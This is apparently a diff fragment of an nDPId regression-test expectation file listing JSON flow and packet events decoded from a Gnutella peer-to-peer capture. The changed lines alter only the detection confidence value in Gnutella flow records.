00554{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":710,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":85607,"flow_last_seen":85607,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":85607,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"1.172.184.48","src_port":50272,"dst_port":13298,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":710,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":226,"flow_packet_id":1,"flow_last_seen":85607,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":85607,"pkt":"UlQAEjUCCAAn5uVZCABFAAA07jxAAIAGRpwKAAIPAay4MMRgM\/L4VuGpAAAAAIAC+vDb4AAAAgQFtAEDAwgBAQQC"} 00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":711,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":85607,"flow_last_seen":85607,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":85607,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"24.179.18.242","src_port":50273,"dst_port":47329,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
@@ -737,10 +737,10 @@ 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":743,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":241,"flow_packet_id":1,"flow_last_seen":88706,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":88706,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0QYJAAIAGx78KAAIPYteCnMRvMHWjnzXtAAAAAIAC+vC0KwAAAgQFtAEDAwgBAQQC"} 00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":746,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":239,"flow_packet_id":2,"flow_last_seen":88816,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":88816,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsAyoAAEAGurFLhWVdCgACD8yPxG0AoxYBwnfwg2AS\/\/+AiAAAAgQFtA=="} 00439{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":747,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":239,"flow_packet_id":3,"flow_last_seen":88816,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":88816,"pkt":"UlQAEjUCCAAn5uVZCABFAAAocclAAIAGzBUKAAIPS4VlXcRtzI\/Cd\/CDAKMWAlAQ+vCdVAAA"} -00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":748,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":88704,"flow_last_seen":88817,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":88817,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"75.133.101.93","src_port":50285,"dst_port":52367,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": 
{"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":748,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":88704,"flow_last_seen":88817,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":88817,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"75.133.101.93","src_port":50285,"dst_port":52367,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":750,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":238,"flow_packet_id":2,"flow_last_seen":88832,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":88832,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsAywAAEAGIK1onOJICgACD9AKxGwApBABxlioc2AS\/\/8tOgAAAgQFtA=="} 00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":751,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":238,"flow_packet_id":3,"flow_last_seen":88832,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":88832,"pkt":"UlQAEjUCCAAn5uVZCABFAAAo5t9AAIAGvPwKAAIPaJziSMRs0ArGWKhzAKQQAlAQ+vBKBgAA"} 
-00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":752,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":88704,"flow_last_seen":88833,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":88833,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"104.156.226.72","src_port":50284,"dst_port":53258,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":752,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":88704,"flow_last_seen":88833,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":88833,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"104.156.226.72","src_port":50284,"dst_port":53258,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":754,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":95,"flow_packet_id":3,"flow_last_seen":88897,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":88897,"pkt":"CAAn5uVZUlQAEjUCCABFwAA4Ay4AAP8Bn8YKAAICCgACDwMBvHoAAAAARQAANFAnQAB\/BsDKCgACD3p1ZE7EYyMyoRe31g=="} 
00558{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":758,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":88941,"flow_last_seen":88941,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":88941,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"75.133.101.93","src_port":28681,"dst_port":52367,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":758,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":242,"flow_packet_id":1,"flow_last_seen":88941,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":88941,"pkt":"UlQAEjUCCAAn5uVZCABFAAA4ccwAAIARC\/gKAAIPS4VlXXAJzI8AJKBHjeQxAkkpJRz\/KX356SYEAwABAAUAAADDglFLQA=="} 
@@ -760,71 +760,71 @@ 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":784,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":245,"flow_packet_id":1,"flow_last_seen":89733,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":89733,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0nYFAAIAGGXcKAAIPSsPs+cRxSH3g2g3bAAAAAIAC+vA0rwAAAgQFtAEDAwgBAQQC"} 00557{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":786,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":246,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":89829,"flow_last_seen":89829,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":89829,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"96.65.68.194","src_port":28681,"dst_port":35481,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00533{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":786,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":246,"flow_packet_id":1,"flow_last_seen":89829,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":89829,"pkt":"UlQAEjUCCAAn5uVZCABFAABtBGAAAIARhQ4KAAIPYEFEwnAJipkAWRiep7MxAim3LsYw33fFcko2zkQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAACidCo0G3v\/IJjwziXwskXn9hKth"} 
-00751{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":786,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":246,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":89829,"flow_last_seen":89829,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":89829,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"96.65.68.194","src_port":28681,"dst_port":35481,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00751{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":786,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":246,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":89829,"flow_last_seen":89829,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":89829,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"96.65.68.194","src_port":28681,"dst_port":35481,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
00558{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":787,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":247,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":89829,"flow_last_seen":89829,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":89829,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"181.84.178.16","src_port":28681,"dst_port":60262,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00533{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":787,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":247,"flow_packet_id":1,"flow_last_seen":89829,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":89829,"pkt":"UlQAEjUCCAAn5uVZCABFAABtYHgAAIARZpQKAAIPtVSyEHAJ62YAWWkRdMAxAjueygYrMQV+6lVI4UQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAACidCo0G3v\/IJjwziXwskXn9hKth"} -00752{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":787,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":247,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":89829,"flow_last_seen":89829,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":89829,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"181.84.178.16","src_port":28681,"dst_port":60262,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00752{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":787,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":247,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":89829,"flow_last_seen":89829,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":89829,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"181.84.178.16","src_port":28681,"dst_port":60262,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00558{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":788,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":89829,"flow_last_seen":89829,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":89829,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"66.30.221.181","src_port":28681,"dst_port":12012,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00534{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":788,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":248,"flow_packet_id":1,"flow_last_seen":89829,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":89829,"pkt":"UlQAEjUCCAAn5uVZCABFAABtDeAAAIARAL4KAAIPQh7dtXAJLuwAWQScCKYxAn7wSVwJearIKZuX\/UQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAACidCo0G3v\/IJjwziXwskXn9hKth"} 
-00752{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":788,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":89829,"flow_last_seen":89829,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":89829,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"66.30.221.181","src_port":28681,"dst_port":12012,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00752{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":788,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":89829,"flow_last_seen":89829,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":89829,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"66.30.221.181","src_port":28681,"dst_port":12012,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
01407{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":789,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":246,"flow_packet_id":2,"flow_last_seen":89964,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":769,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":769,"pkt_l4_len":735,"thread_ts_msec":89964,"pkt":"CAAn5uVZUlQAEjUCCABFAALzAzsAAEARw61gQUTCCgACD4qZcAkC3\/jzp7MxAim3LsYw33fFcko2zkQAAMACAAAGR1RLRwAAKfRYs\/Fa1CmeYJshGT65b9iJmmUEYEFEwoqZAQAAAARL51cQFEdUS0cAACpy2K\/2hky2jG7eBxG55EuSykYdBLVUshDrZkdUS0cAACwUV8A2ZtuYGpHmurFJ9ZjbPjd\/BEIe3bUu7FdTSFIAACfu4Bqdy+iW81L+1nr6boaqfinyBC1Yddoa\/UdUS0cAAD\/LrtDBHsrvB2sw44AqY2QCrQYQBDNEmdZmjUdUS0cAADcgJ3MxU+9gPezRvKa4p+wbOpp4BLnL2lzegldTSFIAAAl5O+8DCDmOkVzxf\/SPVwlYhBdwBEiMeCm6e0dUS0cAAAucDVWlpiFF+O+mADztiMF+lbMgBMEl\/4LwsEdUS0cAAAyXtfcHfbQ8qEf8F4epyaClpDRCBFh4Sddf8kdUS0cAAA1pNBGyU44u8atjdhBEZcvofBcyBFA93fZ3cUdUS0cAAAAs7ncgF1geHmh4DMpMbatHwhb+BGD2nH7EeUdUS0cAAABa1S31uxK2I4OJWHaC\/PKs7lhZBFK1+9qOEFdTSFIAAAPVZnOFlO42Ib8H+pWWlT4wyAL3BBga2F82QUdUS0cAAAZMeTOG2LuCeHzpFv+0pfJ1qOd4BGfoa2Sp9EdUS0cAABiF4URzeX7Vdi93GjTzJphEA0s1BC6AcmsZskdUS0cAABjf5v+Urk90V\/WPMxinQSIciE4\/BDzxMMJTNUdUS0cAABnDsbPWKLbuWCN54AyWtjRM+4cSBFlLNBOzuldTSFIAABreJpDCEhk5HaHmWa2KZ2KgQT+tBFLZsDQdFkdUS0cAABpaaFBDXGgpcSmxYhITGidbcBteBEuFZV3Mj0dUS0cAAB9npzFZ8csWEevUVjGg\/Ev3bcglBF8KzUMtU0dUS0cAABEOG4JNEDwVGDdOEVl98CTJsF5uBMvcxvQEqg=="} 00557{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":790,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":89966,"flow_last_seen":89966,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":89966,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"45.88.117.218","src_port":28681,"dst_port":6909,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00533{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":790,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":249,"flow_packet_id":1,"flow_last_seen":89966,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":89966,"pkt":"UlQAEjUCCAAn5uVZCABFAABthPwAAIARBkMKAAIPLVh12nAJGv0AWWOTCPExAoCeF40w0KwTJyzTOUQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAACidCo0G3v\/IJjwziXwskXn9hKth"} -00751{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":790,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":89966,"flow_last_seen":89966,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":89966,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"45.88.117.218","src_port":28681,"dst_port":6909,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00751{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":790,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":89966,"flow_last_seen":89966,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":89966,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"45.88.117.218","src_port":28681,"dst_port":6909,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": 
{"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00558{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":791,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":250,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":89966,"flow_last_seen":89966,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":89966,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"51.68.153.214","src_port":28681,"dst_port":26253,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00533{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":791,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":250,"flow_packet_id":1,"flow_last_seen":89966,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":89966,"pkt":"UlQAEjUCCAAn5uVZCABFAABteN4AAIAR6HgKAAIPM0SZ1nAJZo0AWRfF0U0xAgQATbK3Z+3BHrxn1kQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAACidCo0G3v\/IJjwziXwskXn9hKth"} -00752{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":791,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":250,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":89966,"flow_last_seen":89966,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":89966,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"51.68.153.214","src_port":28681,"dst_port":26253,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00752{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":791,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":250,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":89966,"flow_last_seen":89966,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":89966,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"51.68.153.214","src_port":28681,"dst_port":26253,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00559{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":792,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":251,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":89967,"flow_last_seen":89967,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":89967,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"185.203.218.92","src_port":28681,"dst_port":56962,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00535{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":792,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":251,"flow_packet_id":1,"flow_last_seen":89967,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":89967,"pkt":"UlQAEjUCCAAn5uVZCABFAABtv\/sAAIAR2k0KAAIPucvaXHAJ3oIAWehILgsxAjPZohvFNPL\/fzMDzUQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAACidCo0G3v\/IJjwziXwskXn9hKth"} 
-00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":792,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":251,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":89967,"flow_last_seen":89967,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":89967,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"185.203.218.92","src_port":28681,"dst_port":56962,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":792,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":251,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":89967,"flow_last_seen":89967,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":89967,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"185.203.218.92","src_port":28681,"dst_port":56962,"l4_proto":"udp","ndpi": {"flow_risk": 